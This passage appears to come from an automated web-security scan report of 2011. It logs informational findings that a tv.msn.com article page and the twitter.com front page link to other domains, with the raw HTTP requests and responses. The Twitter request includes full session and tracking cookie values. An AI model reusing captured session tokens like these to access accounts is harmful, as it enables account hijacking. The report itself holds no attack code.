<LINK href="http://entcss.s-msn.com/i/lnotv/bud55/css/lnotv_main_bud55_005.css" type=text/css rel=stylesheet>

<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

17.203. http://tv.msn.com/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/tv/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://tv.msn.com/tv/article.aspx?news=625989&gt1=28103

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entcss.s-msn.com/styles/tvvertical9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg
http://entimg.s-msn.com/i/grandprix/Digg.gif
http://entimg.s-msn.com/i/grandprix/discuss.gif
http://entimg.s-msn.com/i/grandprix/leftNavBg.gif
http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif
http://entimg.s-msn.com/i/grandprix/mail.gif
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/grandprix/spacesBlog.gif
http://entimg.s-msn.com/i/ms/RssIcon.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-msn.com/js/ch/channels.css
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=BC
http://www.bing.com/search?q=Charlie+Sheen&form=msnena
http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2ftv.msn.com%2ftv%2farticle.aspx%3fnews%3d625989%26affid%3dfb
http://www.myhomemsn.com/
http://www.thewrap.com/
http://www.thewrap.com/television/article/breaking-charlie-sheen-goes-rehab-24315
http://www.thewrap.com/television/column-post/charlie-sheens-perfectly-reasonable-explanations-24309
http://www.thewrap.com/television/column-post/warner-brothers-sheen-......two-and-half-men...-secondary-get-charlie-healthy...-2429
http://www.thewrap.com/television/slideshow/charlie-sheen-show-must-go-5-tv-series-lost-their-leads-24355
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661346&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.msn.com%2Ftv%2Farticle.aspx%3Fnews%3D625989%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.msn.com%2ftv%2farticle.aspx%3fnews%3d625989%26gt1%3d28103%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/article.aspx?news=625989&gt1=28103 HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 56179
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=6b7d0b077d554fe08ea1d656868ae58a; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba15
Date: Wed, 02 Feb 2011 15:42:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
How Charli
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=BC">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661346&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.msn.com%2Ftv%2Farticle.aspx%3Fnews%3D625989%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.msn.com%2ftv%2farticle.aspx%3fnews%3d625989%26gt1%3d28103%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.msn.com"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="TV News" href="http://tv.msn.com/rss/toptvnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP Photo/Chris Pizzello, File" src="http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg" alt="Charlie Sheen" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<BR><a href=http://www.thewrap.com class="art" target="new">TheWrap </a>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=Charlie+Sheen&form=msnena class="art">Charlie Sheen</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena class="art">Charlie Sheen's recent woes</a>
...[SNIP]...
</STRONG> <a href=http://www.thewrap.com/television/slideshow/charlie-sheen-show-must-go-5-tv-series-lost-their-leads-24355 class="art" target="new">Charlie, the show must go on: 5 TV series that lost their leads</a>
...[SNIP]...
</STRONG><a href=http://www.thewrap.com/television/article/breaking-charlie-sheen-goes-rehab-24315 class="art" target="new">Charlie Sheen goes into rehab; show is on hiatus</a>
...[SNIP]...
</STRONG><a href=http://www.thewrap.com/television/article/breaking-charlie-sheen-goes-rehab-24315 class="art" target="new">Charlie Sheen goes into rehab; show is on hiatus</a><BR><a href=http://www.thewrap.com/television/column-post/charlie-sheens-perfectly-reasonable-explanations-24309 class="art" target="new">Charlie Sheen's perfectly reasonable explanations</a><BR><a href=http://www.thewrap.com/television/column-post/warner-brothers-sheen-%E2%80%9C%E2%80%99two-and-half-men%E2%80%99-secondary-get-charlie-healthy%E2%80%9D-2429 class="art" target="new">Warner Brothers: 'Two and a Half Men' secondary; Let's get Charlie healthy</a>
...[SNIP]...
<P><a href=http://www.thewrap.com class="art" target="new"><IMG border=0 src="http://entimg.msn.com/i/150/wraplogo_150.jpg">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2ftv.msn.com%2ftv%2farticle.aspx%3fnews%3d625989%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for "More TV News"" href="/rss/toptvnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for "Just In News"" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...

17.204. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/?status=@

The response contains the following links to other domains:

http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296615671
http://a0.twimg.com/profile_images/1180316859/getsocial-blue_normal.jpg
http://a0.twimg.com/profile_images/386937621/TwitterBugTEDTalks_normal.jpg
http://a0.twimg.com/profile_images/54094091/heyitsme_normal.jpg
http://a0.twimg.com/profile_images/553327850/Eustacewbutterfly_normal.png
http://a1.twimg.com/a/1296609216/images/favicon.ico
http://a1.twimg.com/a/1296609216/images/twitter_57.png
http://a1.twimg.com/profile_images/1172114314/image_normal.jpg
http://a1.twimg.com/profile_images/1174327105/twitpic2_normal.jpg
http://a1.twimg.com/profile_images/1195050593/coverjan2011_normal.jpg
http://a1.twimg.com/profile_images/183611204/facebook2_normal.jpg
http://a1.twimg.com/profile_images/463382137/Untitled_normal.png
http://a1.twimg.com/profile_images/491041759/Travelzoo_100x100_normal.jpg
http://a1.twimg.com/profile_images/58688822/wildflower_normal.png
http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a2.twimg.com/profile_images/1202937599/235121834_normal.jpg
http://a2.twimg.com/profile_images/1231264889/Datboiquito_normal.jpg
http://a2.twimg.com/profile_images/52942196/tony_CEO_normal.gif
http://a2.twimg.com/profile_images/552497710/Tara_Kuczykowski_Cropped_normal.jpg
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671
http://a3.twimg.com/profile_images/1186612595/diddy-dirty-money-last-train-to-paris-300x300_normal.jpg
http://a3.twimg.com/profile_images/1213838680/IMG_0265_normal.jpg
http://a3.twimg.com/profile_images/122089689/logosqlarge_normal.gif
http://a3.twimg.com/profile_images/470269873/Alec-April2008-8_normal.jpg
http://a3.twimg.com/profile_images/619204419/top-chef-tom-colicchio-has-baby_normal.jpg
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /?status=@ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:06 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664206-95467-35481
ETag: "47062c25e8210969db6849006a415923"
Last-Modified: Wed, 02 Feb 2011 16:30:06 GMT
X-Runtime: 0.05398
Content-Type: text/html; charset=utf-8
Content-Length: 43444
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296609216/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296609216/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296609216/stylesheets/fronts.css?1296615671" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296609216/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296609216/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
<a href="/kingsthings" class="avatar-sm" hreflang="en" id="icon_kingsthings" rel="kingsthings" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/183611204/facebook2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/kingsthings" class="avatar" hreflang="en" target="_blank"><img alt="kingsthings" border="0" height="48" src="http://a1.twimg.com/profile_images/183611204/facebook2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Travelzoo" class="avatar-sm" hreflang="en" id="icon_Travelzoo" rel="Travelzoo" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/491041759/Travelzoo_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Travelzoo" class="avatar" hreflang="en" target="_blank"><img alt="Travelzoo" border="0" height="48" src="http://a1.twimg.com/profile_images/491041759/Travelzoo_100x100_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/zappos" class="avatar-sm" hreflang="en" id="icon_zappos" rel="zappos" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/52942196/tony_CEO_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/zappos" class="avatar" hreflang="en" target="_blank"><img alt="zappos" border="0" height="48" src="http://a2.twimg.com/profile_images/52942196/tony_CEO_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChildPsychology" class="avatar-sm" hreflang="en" id="icon_ChildPsychology" rel="ChildPsychology" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/122089689/logosqlarge_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChildPsychology" class="avatar" hreflang="en" target="_blank"><img alt="ChildPsychology" border="0" height="48" src="http://a3.twimg.com/profile_images/122089689/logosqlarge_normal.gif" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Chad_Hurley" class="avatar-sm" hreflang="en" id="icon_Chad_Hurley" rel="Chad_Hurley" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/54094091/heyitsme_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Chad_Hurley" class="avatar" hreflang="en" target="_blank"><img alt="Chad_Hurley" border="0" height="48" src="http://a0.twimg.com/profile_images/54094091/heyitsme_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChrisJohnson28" class="avatar-sm" hreflang="en" id="icon_ChrisJohnson28" rel="ChrisJohnson28" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1202937599/235121834_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/ChrisJohnson28" class="avatar" hreflang="en" target="_blank"><img alt="ChrisJohnson28" border="0" height="48" src="http://a2.twimg.com/profile_images/1202937599/235121834_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/1bog" class="avatar-sm" hreflang="en" id="icon_1bog" rel="1bog" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/463382137/Untitled_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/1bog" class="avatar" hreflang="en" target="_blank"><img alt="1bog" border="0" height="48" src="http://a1.twimg.com/profile_images/463382137/Untitled_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/goodhealth" class="avatar-sm" hreflang="en" id="icon_goodhealth" rel="goodhealth" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1195050593/coverjan2011_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/goodhealth" class="avatar" hreflang="en" target="_blank"><img alt="goodhealth" border="0" height="48" src="http://a1.twimg.com/profile_images/1195050593/coverjan2011_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DealSeekingMom" class="avatar-sm" hreflang="en" id="icon_DealSeekingMom" rel="DealSeekingMom" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/552497710/Tara_Kuczykowski_Cropped_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/DealSeekingMom" class="avatar" hreflang="en" target="_blank"><img alt="DealSeekingMom" border="0" height="48" src="http://a2.twimg.com/profile_images/552497710/Tara_Kuczykowski_Cropped_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/davidblaine" class="avatar-sm" hreflang="en" id="icon_davidblaine" rel="davidblaine" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1172114314/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/davidblaine" class="avatar" hreflang="en" target="_blank"><img alt="davidblaine" border="0" height="48" src="http://a1.twimg.com/profile_images/1172114314/image_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AlecJRoss" class="avatar-sm" hreflang="en" id="icon_AlecJRoss" rel="AlecJRoss" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/470269873/Alec-April2008-8_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/AlecJRoss" class="avatar" hreflang="en" target="_blank"><img alt="AlecJRoss" border="0" height="48" src="http://a3.twimg.com/profile_images/470269873/Alec-April2008-8_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Datboiquito" class="avatar-sm" hreflang="en" id="icon_Datboiquito" rel="Datboiquito" target="_blank"><img alt="" border="0" height="48" src="http://a2.twimg.com/profile_images/1231264889/Datboiquito_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/Datboiquito" class="avatar" hreflang="en" target="_blank"><img alt="Datboiquito" border="0" height="48" src="http://a2.twimg.com/profile_images/1231264889/Datboiquito_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/NewYorker" class="avatar-sm" hreflang="en" id="icon_NewYorker" rel="NewYorker" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/553327850/Eustacewbutterfly_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/NewYorker" class="avatar" hreflang="en" target="_blank"><img alt="NewYorker" border="0" height="48" src="http://a0.twimg.com/profile_images/553327850/Eustacewbutterfly_normal.png" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/caitkitt" class="avatar-sm" hreflang="en" id="icon_caitkitt" rel="caitkitt" target="_blank"><img alt="" border="0" height="48" src="http://a1.twimg.com/profile_images/1174327105/twitpic2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/caitkitt" class="avatar" hreflang="en" target="_blank"><img alt="caitkitt" border="0" height="48" src="http://a1.twimg.com/profile_images/1174327105/twitpic2_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamdiddy" class="avatar-sm" hreflang="en" id="icon_iamdiddy" rel="iamdiddy" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1186612595/diddy-dirty-money-last-train-to-paris-300x300_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/iamdiddy" class="avatar" hreflang="en" target="_blank"><img alt="iamdiddy" border="0" height="48" src="http://a3.twimg.com/profile_images/1186612595/diddy-dirty-money-last-train-to-paris-300x300_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/tom_colicchio" class="avatar-sm" hreflang="en" id="icon_tom_colicchio" rel="tom_colicchio" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/619204419/top-chef-tom-colicchio-has-baby_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/tom_colicchio" class="avatar" hreflang="en" target="_blank"><img alt="tom_colicchio" border="0" height="48" src="http://a3.twimg.com/profile_images/619204419/top-chef-tom-colicchio-has-baby_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/hodgman" class="avatar-sm" hreflang="en" id="icon_hodgman" rel="hodgman" target="_blank"><img alt="" border="0" height="48" src="http://a3.twimg.com/profile_images/1213838680/IMG_0265_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/hodgman" class="avatar" hreflang="en" target="_blank"><img alt="hodgman" border="0" height="48" src="http://a3.twimg.com/profile_images/1213838680/IMG_0265_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
<a href="/tedtalks" class="avatar-sm" hreflang="en" id="icon_tedtalks" rel="tedtalks" target="_blank"><img alt="" border="0" height="48" src="http://a0.twimg.com/profile_images/386937621/TwitterBugTEDTalks_normal.jpg" style="vertical-align:middle" width="48" /></a>
...[SNIP]...
